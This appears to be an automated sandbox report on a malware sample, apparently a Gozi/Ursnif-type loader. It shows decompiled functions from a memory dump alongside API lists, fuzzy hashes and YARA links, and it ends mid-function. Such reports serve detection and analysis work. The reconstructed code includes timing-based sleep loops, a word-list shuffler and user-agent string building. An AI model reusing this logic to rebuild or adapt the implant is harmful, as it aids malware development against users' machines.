                                                          Function 046712E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E046712E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x467d238 = _t10;
				if(_t10 != 0) {
					 *0x467d1a8 = GetTickCount();
					_t12 = E04673E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0467B08A();
							_t33 = _t14 + _t16;
							_t18 = E04675548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04674DA2(_t25) != 0) {
							 *0x467d260 = 1; // executed
						}
						_t12 = E04675BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x046712e5
                                                          0x046712eb
                                                          0x046712ec
                                                          0x046712f8
                                                          0x046712fe
                                                          0x04671305
                                                          0x04671315
                                                          0x0467131a
                                                          0x04671321
                                                          0x04671323
                                                          0x04671328
                                                          0x0467132e
                                                          0x04671334
                                                          0x0467133e
                                                          0x04671342
                                                          0x04671344
                                                          0x04671349
                                                          0x0467134a
                                                          0x0467134b
                                                          0x04671350
                                                          0x04671356
                                                          0x0467135f
                                                          0x04671360
                                                          0x04671365
                                                          0x0467136b
                                                          0x04671377
                                                          0x04671379
                                                          0x04671379
                                                          0x04671383
                                                          0x04671383
                                                          0x04671307
                                                          0x04671309
                                                          0x04671309
                                                          0x0467138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 046712F8
                                                          • GetTickCount.KERNEL32 ref: 0467130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04674EF2,?), ref: 04671328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 0467132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0467134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04674EF2,?), ref: 04671365
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 7bacdc3bf4f9bbf2ec82b00d47c9d444f7e606f1e6500d89631ea657785fa49e
                                                          • Instruction ID: c228dfe06d7ec83d19387c7c88d5cfefc7dde8d5a6695f5c63bfa5559d72c87c
                                                          • Opcode Fuzzy Hash: 7bacdc3bf4f9bbf2ec82b00d47c9d444f7e606f1e6500d89631ea657785fa49e
                                                          • Instruction Fuzzy Hash: A4110872A40300BFF314AB74DC19F6A3B98EB44364F00451AFA85D6780FA79FC0086A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04675BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E04675BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04676C09();
				if(_t21 != 0) {
					_t59 =  *0x467d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x467d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x467d160(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0467496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x467d2a8; // 0x47a5a8
					if( *0x467d25c > 5) {
						_t8 = _t26 + 0x467e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x467e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E0467729A(_t27, _t27);
					_t31 = E0467232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x467d270 =  *0x467d270 ^ 0x81bbe65d;
						_t32 = E0467A71F(0x60);
						 *0x467d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x467d32c; // 0x4af95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x467d32c; // 0x4af95b0
							 *_t51 = 0x467e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x467d238, 0, 0x43);
							 *0x467d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x467d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x467d2a8; // 0x47a5a8
								_t13 = _t58 + 0x467e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x467c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04679135( ~_v8 &  *0x467d270, 0x467d00c); // executed
								_t54 = E0467888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E046787AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E046751B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04671C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x467d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0467A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x04675ba2
                                                          0x04675bad
                                                          0x04675bb0
                                                          0x04675bb3
                                                          0x04675bb6
                                                          0x04675bbd
                                                          0x04675bbf
                                                          0x04675bcb
                                                          0x04675bcd
                                                          0x04675bcd
                                                          0x04675bd6
                                                          0x04675bdc
                                                          0x04675be1
                                                          0x04675bfb
                                                          0x04675c07
                                                          0x04675c09
                                                          0x04675c0e
                                                          0x04675c18
                                                          0x04675c18
                                                          0x04675c10
                                                          0x04675c10
                                                          0x04675c10
                                                          0x04675c10
                                                          0x04675c1f
                                                          0x04675c2c
                                                          0x04675c33
                                                          0x04675c38
                                                          0x04675c38
                                                          0x04675c40
                                                          0x04675c43
                                                          0x04675c69
                                                          0x04675c75
                                                          0x04675c7a
                                                          0x04675c7f
                                                          0x04675c81
                                                          0x04675cad
                                                          0x04675caf
                                                          0x04675c83
                                                          0x04675c87
                                                          0x04675c8c
                                                          0x04675c91
                                                          0x04675c98
                                                          0x04675c9e
                                                          0x04675ca3
                                                          0x04675ca9
                                                          0x04675cb0
                                                          0x04675cb2
                                                          0x04675cb4
                                                          0x04675cc3
                                                          0x04675cc9
                                                          0x04675cce
                                                          0x04675cd0
                                                          0x04675d00
                                                          0x04675d02
                                                          0x04675cd2
                                                          0x04675cd2
                                                          0x04675cd8
                                                          0x04675ce5
                                                          0x04675ceb
                                                          0x04675ceb
                                                          0x04675cf3
                                                          0x04675cfc
                                                          0x04675d03
                                                          0x04675d05
                                                          0x04675d07
                                                          0x04675d0e
                                                          0x04675d1b
                                                          0x04675d25
                                                          0x04675d27
                                                          0x04675d29
                                                          0x00000000
                                                          0x00000000
                                                          0x04675d2b
                                                          0x04675d30
                                                          0x04675d32
                                                          0x04675d39
                                                          0x04675d3d
                                                          0x04675d40
                                                          0x04675d55
                                                          0x04675d59
                                                          0x04675d5e
                                                          0x00000000
                                                          0x04675d5e
                                                          0x04675d42
                                                          0x04675d44
                                                          0x00000000
                                                          0x00000000
                                                          0x04675d4f
                                                          0x04675d51
                                                          0x04675d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04675d53
                                                          0x04675d36
                                                          0x04675d36
                                                          0x04675d07
                                                          0x04675c45
                                                          0x04675c45
                                                          0x04675c4a
                                                          0x04675d60
                                                          0x04675d64
                                                          0x04675d6c
                                                          0x04675d6c
                                                          0x00000000
                                                          0x04675d64
                                                          0x04675c50
                                                          0x04675c53
                                                          0x04675c5d
                                                          0x04675c64
                                                          0x00000000
                                                          0x04675d74
                                                          0x04675d74
                                                          0x04675d78
                                                          0x04675d7c
                                                          0x04675d7c

                                                          APIs
                                                            • Part of subcall function 04676C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04675BBB,00000000,00000000), ref: 04676C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04675C38
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • memset.NTDLL ref: 04675C87
                                                          • RtlInitializeCriticalSection.NTDLL(04AF9570), ref: 04675C98
                                                            • Part of subcall function 04671C66: memset.NTDLL ref: 04671C7B
                                                            • Part of subcall function 04671C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04671CBD
                                                            • Part of subcall function 04671C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04671CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04675CC3
                                                          • wsprintfA.USER32 ref: 04675CF3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: e9d3482daf5f16dd04da7e43a8ee35d99b39e3069d6313bfcbae88328c9f27d6
                                                          • Instruction ID: 7c1e8ef3aaa1cf482f21a47acd1707ad3daa263c0c9c338ddf7e8323d764157a
                                                          • Opcode Fuzzy Hash: e9d3482daf5f16dd04da7e43a8ee35d99b39e3069d6313bfcbae88328c9f27d6
                                                          • Instruction Fuzzy Hash: 0E51D971A00218BBEB25AFA4DC48F6E77A8EF04754F04889AE603D7640F678FD458B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046762DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E046762DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E0467A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0467A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E0467A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x467d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x046762e1
                                                          0x046762e8
                                                          0x046762ed
                                                          0x046762f0
                                                          0x046762f7
                                                          0x046762fa
                                                          0x046762fd
                                                          0x04676302
                                                          0x04676307
                                                          0x0467645b
                                                          0x0467645d
                                                          0x0467645f
                                                          0x04676464
                                                          0x04676464
                                                          0x0467630d
                                                          0x04676310
                                                          0x04676313
                                                          0x04676315
                                                          0x04676315
                                                          0x04676319
                                                          0x00000000
                                                          0x00000000
                                                          0x0467631d
                                                          0x04676349
                                                          0x0467634e
                                                          0x04676350
                                                          0x04676350
                                                          0x04676353
                                                          0x04676356
                                                          0x04676356
                                                          0x04676358
                                                          0x00000000
                                                          0x04676323
                                                          0x04676325
                                                          0x04676344
                                                          0x04676344
                                                          0x0467635b
                                                          0x0467635b
                                                          0x0467635c
                                                          0x0467635c
                                                          0x0467635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0467635f
                                                          0x04676329
                                                          0x04676370
                                                          0x04676374
                                                          0x0467644e
                                                          0x04676450
                                                          0x04676450
                                                          0x04676451
                                                          0x04676454
                                                          0x00000000
                                                          0x04676454
                                                          0x0467637d
                                                          0x0467638e
                                                          0x04676392
                                                          0x0467644a
                                                          0x00000000
                                                          0x0467644a
                                                          0x04676398
                                                          0x0467639b
                                                          0x0467639f
                                                          0x046763a3
                                                          0x046763a8
                                                          0x04676440
                                                          0x04676440
                                                          0x00000000
                                                          0x04676446
                                                          0x046763b3
                                                          0x046763bc
                                                          0x046763d0
                                                          0x046763d7
                                                          0x046763ec
                                                          0x046763f2
                                                          0x046763fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046763fc
                                                          0x046763fc
                                                          0x046763fc
                                                          0x04676403
                                                          0x0467640b
                                                          0x00000000
                                                          0x00000000
                                                          0x0467640d
                                                          0x04676416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04676418
                                                          0x0467641a
                                                          0x0467641d
                                                          0x0467641d
                                                          0x04676420
                                                          0x04676424
                                                          0x04676427
                                                          0x0467642d
                                                          0x04676430
                                                          0x04676437
                                                          0x00000000
                                                          0x046763b3
                                                          0x0467632e
                                                          0x04676336
                                                          0x0467633c
                                                          0x0467633e
                                                          0x0467633e
                                                          0x04676341
                                                          0x04676343
                                                          0x00000000
                                                          0x04676343
                                                          0x0467631d
                                                          0x04676363
                                                          0x04676368
                                                          0x0467636a
                                                          0x0467636a
                                                          0x0467636d
                                                          0x0467636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 046763D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 046763EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04676403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04676427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 8ba80e415d48e89130909757a71231d42d9df73c3654c916637697e661b7b19b
                                                          • Instruction ID: c2ea83633b300473ee78dfc2ea27c075720ac74af40f3257609f5b91abfb02d6
                                                          • Opcode Fuzzy Hash: 8ba80e415d48e89130909757a71231d42d9df73c3654c916637697e661b7b19b
                                                          • Instruction Fuzzy Hash: A151CF71A00608EBDF25CF99C8846ADBBB6FF51324F14C06AE9159B205E771BA52CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04676545, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E04676545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E0467A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                          0x04676551
                                                          0x04676555
                                                          0x04676556
                                                          0x04676557
                                                          0x04676559
                                                          0x0467655b
                                                          0x0467655e
                                                          0x04676563
                                                          0x046765fa
                                                          0x04676601
                                                          0x04676601
                                                          0x0467656c
                                                          0x04676573
                                                          0x04676583
                                                          0x04676583
                                                          0x04676589
                                                          0x0467658b
                                                          0x04676590
                                                          0x04676599
                                                          0x0467659f
                                                          0x046765a4
                                                          0x046765af
                                                          0x046765b3
                                                          0x046765b5
                                                          0x046765b6
                                                          0x046765bf
                                                          0x046765c3
                                                          0x046765d4
                                                          0x046765c5
                                                          0x046765ca
                                                          0x046765cf
                                                          0x046765de
                                                          0x046765de
                                                          0x046765b3
                                                          0x046765e4
                                                          0x046765ea
                                                          0x046765ea
                                                          0x046765f3
                                                          0x046765f8
                                                          0x046765f8
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1198164300-0
                                                          • Opcode ID: 9fc9181dd25e4b3e16b4d7122619a43391321fa84eb7e6c9f389cb94d9d9851f
                                                          • Instruction ID: 1e92f49222948b6408076d920faac1d3c6b90dcf26cda0a2903905e3287d94ae
                                                          • Opcode Fuzzy Hash: 9fc9181dd25e4b3e16b4d7122619a43391321fa84eb7e6c9f389cb94d9d9851f
                                                          • Instruction Fuzzy Hash: E5213D7590060AEFDB11DFA8C98499EBBB8FF58314B2041A9E902E7314FB31EE05DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04678D14, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04678D14(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0467A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x467d2a8; // 0x47a5a8
				_t4 = _t24 + 0x467edc0; // 0x4af9368
				_t5 = _t24 + 0x467ed68; // 0x4f0053
				_t45 = E04675356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x467d2a8; // 0x47a5a8
						_t11 = _t32 + 0x467edb4; // 0x4af935c
						_t48 = _t11;
						_t12 = _t32 + 0x467ed68; // 0x4f0053
						_t52 = E046745C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x467d2a8; // 0x47a5a8
							_t13 = _t35 + 0x467edfe; // 0x30314549
							if(E04678E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x467d25c - 6;
								if( *0x467d25c <= 6) {
									_t42 =  *0x467d2a8; // 0x47a5a8
									_t15 = _t42 + 0x467ec0a; // 0x52384549
									E04678E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x467d2a8; // 0x47a5a8
							_t17 = _t38 + 0x467edf8; // 0x4af93a0
							_t18 = _t38 + 0x467edd0; // 0x680043
							_t40 = E04675D7D(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x467d238, 0, _t52);
						}
					}
					HeapFree( *0x467d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04674F14(_t54);
				}
				return _t45;
			}


















                                                          0x04678d14
                                                          0x04678d24
                                                          0x04678d27
                                                          0x04678d2e
                                                          0x04678d30
                                                          0x04678d30
                                                          0x04678d33
                                                          0x04678d38
                                                          0x04678d3f
                                                          0x04678d51
                                                          0x04678d55
                                                          0x04678d63
                                                          0x04678d71
                                                          0x04678d75
                                                          0x04678e06
                                                          0x04678e06
                                                          0x04678d7b
                                                          0x04678d7b
                                                          0x04678d80
                                                          0x04678d80
                                                          0x04678d87
                                                          0x04678d93
                                                          0x04678d95
                                                          0x04678d97
                                                          0x04678d99
                                                          0x04678da0
                                                          0x04678db2
                                                          0x04678db4
                                                          0x04678dbb
                                                          0x04678dbd
                                                          0x04678dc4
                                                          0x04678dcf
                                                          0x04678dcf
                                                          0x04678dbb
                                                          0x04678dd4
                                                          0x04678dd9
                                                          0x04678de0
                                                          0x04678df0
                                                          0x04678dfe
                                                          0x04678e00
                                                          0x04678e00
                                                          0x04678d97
                                                          0x04678e12
                                                          0x04678e12
                                                          0x04678e14
                                                          0x04678e19
                                                          0x04678e1b
                                                          0x04678e1b
                                                          0x04678e26

                                                          APIs
                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04AF9368,00000000,?,74B5F710,00000000,74B5F730), ref: 04678D63
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04AF93A0,?,00000000,30314549,00000014,004F0053,04AF935C), ref: 04678E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0467523E), ref: 04678E12
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 04f9b21fbb20aa656264ebc734405bea4db848f28bb146fe94c0b6952d88bfa1
                                                          • Instruction ID: e2c6effa2d71a9f44096182ddab684fe7cd101bec532124647324b2b08e81121
                                                          • Opcode Fuzzy Hash: 04f9b21fbb20aa656264ebc734405bea4db848f28bb146fe94c0b6952d88bfa1
                                                          • Instruction Fuzzy Hash: 4331C271910109BFEB10EB90DC48E9E7BBDEF44708F1445AAB6109B220FB71AE49CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467A376, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0467A376(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t25;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x467d340; // 0x4af9a88
				_push(0x800);
				_push(0);
				_push( *0x467d238);
				if( *0x467d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x467d24c =  *0x467d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04677306(_t44, _t40);
						_t18 = E04674A09(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x467d24c < 5) {
								 *0x467d24c =  *0x467d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04676761();
						RtlFreeHeap( *0x467d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E04671F13(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
